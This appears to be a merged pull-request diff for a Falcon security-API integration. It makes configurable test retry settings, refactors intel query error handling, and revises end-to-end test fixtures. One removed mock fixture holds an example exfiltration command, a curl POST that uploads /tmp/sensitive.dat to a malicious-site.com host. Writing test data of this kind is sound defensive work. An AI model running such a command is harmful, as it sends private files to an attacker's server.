Merged
2 changes: 2 additions & 0 deletions .env.example
@@ -13,3 +13,5 @@ FALCON_CLIENT_SECRET=your-client-secret
# OPENAI_API_KEY=your-openai-api-key
# OPENAI_BASE_URL=https://your-custom-llm-endpoint.com/v1 # Custom LLM API endpoint for testing
# MODELS_TO_TEST=example-model-1,example-model-2 # Comma-separated list of models to test
# RUNS_PER_TEST=2
# SUCCESS_THRESHOLD=0.7
20 changes: 13 additions & 7 deletions docs/e2e_testing.md
@@ -94,17 +94,23 @@ The E2E tests use a retry mechanism to handle the non-deterministic nature of LLMs.
The retry configuration can be found at the top of `tests/e2e/utils/base_e2e_test.py`:

```python
# Models to test against
MODELS_TO_TEST = ["gpt-4.1-mini", "gpt-4o-mini"]
# Number of times to run each test
RUNS_PER_TEST = 2
# Success threshold for passing a test
SUCCESS_THRESHOLD = 0.7
# Default models to test against
DEFAULT_MODELS_TO_TEST = ["gpt-4.1-mini", "gpt-4o-mini"]
# Default number of times to run each test
DEFAULT_RUNS_PER_TEST = 2
# Default success threshold for passing a test
DEFAULT_SUCCESS_THRESHOLD = 0.7
```

With these defaults, each test runs twice per model, and it passes if at least 70% of its runs succeed.
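
For illustration only, the pass rule these defaults imply might be sketched like this (an assumed formulation, not the verbatim code in `tests/e2e/utils/base_e2e_test.py`):

```python
# Assumed pass rule: a test passes when its observed success rate across
# all runs meets or exceeds the configured threshold.
def test_passes(successes: int, runs: int, threshold: float = 0.7) -> bool:
    return runs > 0 and (successes / runs) >= threshold

assert test_passes(2, 2, 0.7)      # 100% success rate -> pass
assert not test_passes(1, 2, 0.7)  # 50% success rate -> fail
```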

You can override the models to test using the `MODELS_TO_TEST` environment variable:
Each of these can be overridden with the corresponding environment variable (see the sketch below):

- `MODELS_TO_TEST`
- `RUNS_PER_TEST`
- `SUCCESS_THRESHOLD`
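
A minimal sketch of how these overrides might be resolved, assuming plain `os.environ` lookups and a comma-separated model list (the actual resolution lives in `tests/e2e/utils/base_e2e_test.py`):

```python
import os

DEFAULT_MODELS_TO_TEST = ["gpt-4.1-mini", "gpt-4o-mini"]
DEFAULT_RUNS_PER_TEST = 2
DEFAULT_SUCCESS_THRESHOLD = 0.7

# Environment variables take precedence over the defaults above.
MODELS_TO_TEST = os.environ.get(
    "MODELS_TO_TEST", ",".join(DEFAULT_MODELS_TO_TEST)
).split(",")
RUNS_PER_TEST = int(os.environ.get("RUNS_PER_TEST", DEFAULT_RUNS_PER_TEST))
SUCCESS_THRESHOLD = float(
    os.environ.get("SUCCESS_THRESHOLD", DEFAULT_SUCCESS_THRESHOLD)
)
```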

For example:

```bash
# Test with Claude models
42 changes: 21 additions & 21 deletions src/modules/intel.py
@@ -52,7 +52,7 @@ def query_actor_entities(
offset: Optional[int] = Field(default=0, ge=0, description="Starting index of overall result set from which to return ids."),
sort: Optional[str] = Field(default=None, description="The property to sort by. (Ex: created_date|desc)"),
q: Optional[str] = Field(default=None, description="Free text search across all indexed fields."),
) -> Dict[str, Any]:
) -> List[Dict[str, Any]]:
"""Get info about actors that match provided FQL filters.

Args:
@@ -80,16 +80,21 @@ def query_actor_entities(
logger.debug("Searching actors with params: %s", params)

# Make the API request
response = self.client.command(operation, parameters=params)
command_response = self.client.command(operation, parameters=params)

# Handle the response
return handle_api_response(
response,
api_response = handle_api_response(
command_response,
operation=operation,
error_message="Failed to search actors",
default_result=[]
)

if self._is_error(api_response):
return [api_response]

return api_response
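
# A plausible sketch of the _is_error helper used above -- an assumption
# inferred from the inline check it replaces elsewhere in this file
# (isinstance(result, dict) and "error" in result), not the confirmed
# implementation:
#
#     def _is_error(self, response: Any) -> bool:
#         """Return True when handle_api_response yielded an error dict."""
#         return isinstance(response, dict) and "error" in response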

def query_indicator_entities(
self,
filter: Optional[str] = Field(default=None, description="FQL query expression that should be used to limit the results."),
@@ -131,22 +136,20 @@ def query_indicator_entities(
logger.debug("Searching indicators with params: %s", params)

# Make the API request
response = self.client.command(operation, parameters=params)
command_response = self.client.command(operation, parameters=params)

# Handle the response
result = handle_api_response(
response,
api_response = handle_api_response(
command_response,
operation=operation,
error_message="Failed to search indicators",
default_result=[]
)

# If handle_api_response returns an error dict instead of a list,
# it means there was an error, so we return it wrapped in a list
if isinstance(result, dict) and "error" in result:
return [result]
if self._is_error(api_response):
return [api_response]

return result
return api_response

def query_report_entities(
self,
@@ -155,7 +158,6 @@
offset: int = Field(default=0, ge=0, description="Starting index of overall result set from which to return ids."),
sort: Optional[str] = Field(default=None, description="The property to sort by. (Ex: created_date|desc)"),
q: Optional[str] = Field(default=None, description="Free text search across all indexed fields."),
include_deleted: Optional[bool] = Field(default=False, description="Flag indicating if both published and deleted reports should be returned."),
) -> List[Dict[str, Any]]:
"""Get info about reports that match provided FQL filters.

@@ -165,7 +167,6 @@
offset: Starting index of overall result set from which to return ids.
sort: The property to sort by. (Ex: created_date|desc)
q: Free text search across all indexed fields.
include_deleted: Flag indicating if both published and deleted reports should be returned.
fields: The fields to return, or a predefined set of fields in the form of the collection name surrounded by two underscores.

Returns:
@@ -178,7 +179,6 @@
"offset": offset,
"sort": sort,
"q": q,
"include_deleted": include_deleted,
})

# Define the operation name
@@ -187,19 +187,19 @@
logger.debug("Searching reports with params: %s", params)

# Make the API request
response = self.client.command(operation, parameters=params)
command_response = self.client.command(operation, parameters=params)

# Handle the response
result = handle_api_response(
response,
api_response = handle_api_response(
command_response,
operation=operation,
error_message="Failed to search reports",
default_result=[]
)

# If handle_api_response returns an error dict instead of a list,
# it means there was an error, so we return it wrapped in a list
if self._is_error(result):
return [result]
if self._is_error(api_response):
return [api_response]

return result
return api_response
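
Since every `query_*` method now returns `List[Dict[str, Any]]` even on failure, a caller can detect a wrapped error by inspecting the first element. A minimal sketch, with the helper name chosen here purely for illustration:

```python
from typing import Any, Dict, List

def unwrap_or_raise(results: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    # Under the list-wrapping convention above, a failed call yields a
    # single-element list holding an error dict rather than raising.
    if results and isinstance(results[0], dict) and "error" in results[0]:
        raise RuntimeError(f"Intel query failed: {results[0]['error']}")
    return results
```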
61 changes: 21 additions & 40 deletions tests/e2e/modules/test_incidents.py
@@ -24,11 +24,13 @@ async def test_logic():
"validator": lambda kwargs: kwargs.get('parameters', {}).get('limit') == 100,
"response": {
"status_code": 200,
"body": [
{"id": "score-1", "score": 50, "adjusted_score": 60},
{"id": "score-2", "score": 70, "adjusted_score": 80},
{"id": "score-3", "score": 40, "adjusted_score": 50}
]
"body": {
"resources": [
{"id": "score-1", "score": 50, "adjusted_score": 60},
{"id": "score-2", "score": 70, "adjusted_score": 80},
{"id": "score-3", "score": 40, "adjusted_score": 50}
]
}
}
}
]
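
Each fixture pairs an `operation` name with a `validator` over the mocked call's kwargs and a canned `response`. A sketch of how `_create_mock_api_side_effect` might dispatch on that shape (assumed, not the test base class's actual code):

```python
def make_side_effect(fixtures):
    # Returns a callable usable as mock.side_effect: match the operation
    # name, then confirm the call's kwargs with the fixture's validator.
    def side_effect(operation, **kwargs):
        for fixture in fixtures:
            if fixture["operation"] == operation and fixture["validator"](kwargs):
                return fixture["response"]
        return {"status_code": 404, "body": {"resources": []}}
    return side_effect
```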
@@ -41,7 +43,7 @@ async def test_logic():
def assertions(tools, result):
self.assertGreaterEqual(len(tools), 1, "Expected at least 1 tool call")
used_tool = tools[len(tools) - 1]
self.assertEqual(used_tool['input']['tool_name'], "show_crowd_score")
self.assertEqual(used_tool['input']['tool_name'], "falcon_show_crowd_score")

# Verify the output contains the expected data
output = json.loads(used_tool['output'])
Expand Down Expand Up @@ -71,7 +73,7 @@ async def test_logic():
fixtures = [
{
"operation": "QueryIncidents",
"validator": lambda kwargs: "status:'open'" in kwargs.get('parameters', {}).get('filter', ''),
"validator": lambda kwargs: "state:'open'" in kwargs.get('parameters', {}).get('filter', ''),
"response": {"status_code": 200, "body": {"resources": ["incident-1", "incident-2"]}}
},
{
@@ -118,15 +120,15 @@ def assertions(tools, result):
self.assertEqual(used_tool['input']['tool_name'], "falcon_search_incidents")

# Verify the tool input contains the filter
tool_input = json.loads(used_tool['input']['tool_input'])
tool_input = used_tool['input']['tool_input']
self.assertIn("open", tool_input.get('filter', '').lower())

# Verify API call parameters
self.assertGreaterEqual(self._mock_api_instance.command.call_count, 2, "Expected at least 2 API calls")

# Check QueryIncidents call
api_call_1_params = self._mock_api_instance.command.call_args_list[0][1].get('parameters', {})
self.assertIn("status:'open'", api_call_1_params.get('filter', ''))
self.assertIn("state:'open'", api_call_1_params.get('filter', ''))

# Check GetIncidents call
api_call_2_body = self._mock_api_instance.command.call_args_list[1][1].get('body', {})
Expand Down Expand Up @@ -184,7 +186,7 @@ def assertions(tools, result):
self.assertEqual(used_tool['input']['tool_name'], "falcon_get_incident_details")

# Verify the tool input contains the incident ID
tool_input = json.loads(used_tool['input']['tool_input'])
tool_input = used_tool['input']['tool_input']
self.assertIn("incident-3", tool_input.get('ids', []))

# Verify API call parameters
@@ -210,7 +212,7 @@ async def test_logic():
fixtures = [
{
"operation": "QueryBehaviors",
"validator": lambda kwargs: "severity:'critical'" in kwargs.get('parameters', {}).get('filter', ''),
"validator": lambda kwargs: "tactic:'Defense Evasion'" in kwargs.get('parameters', {}).get('filter', ''),
"response": {"status_code": 200, "body": {"resources": ["behavior-1", "behavior-2"]}}
},
{
@@ -222,21 +224,11 @@
"resources": [
{
"id": "behavior-1",
"scenario": "Suspicious Process Activity",
"tactic": "Execution",
"technique": "Command-Line Interface",
"severity": "critical",
"confidence": "high",
"timestamp": "2023-01-15T12:30:00Z"
"tactic": "Defense Evasion",
},
{
"id": "behavior-2",
"scenario": "Suspicious Network Connection",
"tactic": "Command and Control",
"technique": "Non-Standard Port",
"severity": "critical",
"confidence": "medium",
"timestamp": "2023-01-15T13:45:00Z"
"tactic": "Defense Evasion",
}
]
}
@@ -246,7 +238,7 @@

self._mock_api_instance.command.side_effect = self._create_mock_api_side_effect(fixtures)

prompt = "Find all critical severity behaviors"
prompt = "Find behaviors with the tactic 'Defense Evasion'"
return await self._run_agent_stream(prompt)

def assertions(tools, result):
Expand All @@ -255,25 +247,24 @@ def assertions(tools, result):
self.assertEqual(used_tool['input']['tool_name'], "falcon_search_behaviors")

# Verify the tool input contains the filter
tool_input = json.loads(used_tool['input']['tool_input'])
self.assertIn("critical", tool_input.get('filter', '').lower())
tool_input = used_tool['input']['tool_input']
self.assertIn("tactic", tool_input.get('filter', '').lower())

# Verify API call parameters
self.assertGreaterEqual(self._mock_api_instance.command.call_count, 2, "Expected at least 2 API calls")

# Check QueryBehaviors call
api_call_1_params = self._mock_api_instance.command.call_args_list[0][1].get('parameters', {})
self.assertIn("severity:'critical'", api_call_1_params.get('filter', ''))
self.assertIn("tactic:'Defense Evasion'", api_call_1_params.get('filter', ''))

# Check GetBehaviors call
api_call_2_body = self._mock_api_instance.command.call_args_list[1][1].get('body', {})
self.assertEqual(api_call_2_body.get('ids'), ["behavior-1", "behavior-2"])

# Verify result contains behavior information
self.assertIn("behavior-1", result)
self.assertIn("Suspicious Process Activity", result)
self.assertIn("behavior-2", result)
self.assertIn("Suspicious Network Connection", result)
self.assertIn("Defense Evasion", result)

self.run_test_with_retries(
"test_search_behaviors",
@@ -294,15 +285,7 @@ async def test_logic():
"resources": [
{
"id": "behavior-3",
"scenario": "Data Exfiltration Attempt",
"tactic": "Exfiltration",
"technique": "Data Transfer Size Limits",
"severity": "high",
"confidence": "high",
"timestamp": "2023-03-10T08:15:00Z",
"device_id": "device-123",
"filename": "/tmp/suspicious.bin",
"cmdline": "curl -X POST https://malicious-site.com/upload --data-binary @/tmp/sensitive.dat"
}
]
}
@@ -321,7 +304,7 @@ def assertions(tools, result):
self.assertEqual(used_tool['input']['tool_name'], "falcon_get_behavior_details")

# Verify the tool input contains the behavior ID
tool_input = json.loads(used_tool['input']['tool_input'])
tool_input = used_tool['input']['tool_input']
self.assertIn("behavior-3", tool_input.get('ids', []))

# Verify API call parameters
@@ -331,9 +314,7 @@

# Verify result contains behavior information
self.assertIn("behavior-3", result)
self.assertIn("Data Exfiltration Attempt", result)
self.assertIn("Exfiltration", result)
self.assertIn("high", result.lower()) # Severity

self.run_test_with_retries(
"test_get_behavior_details",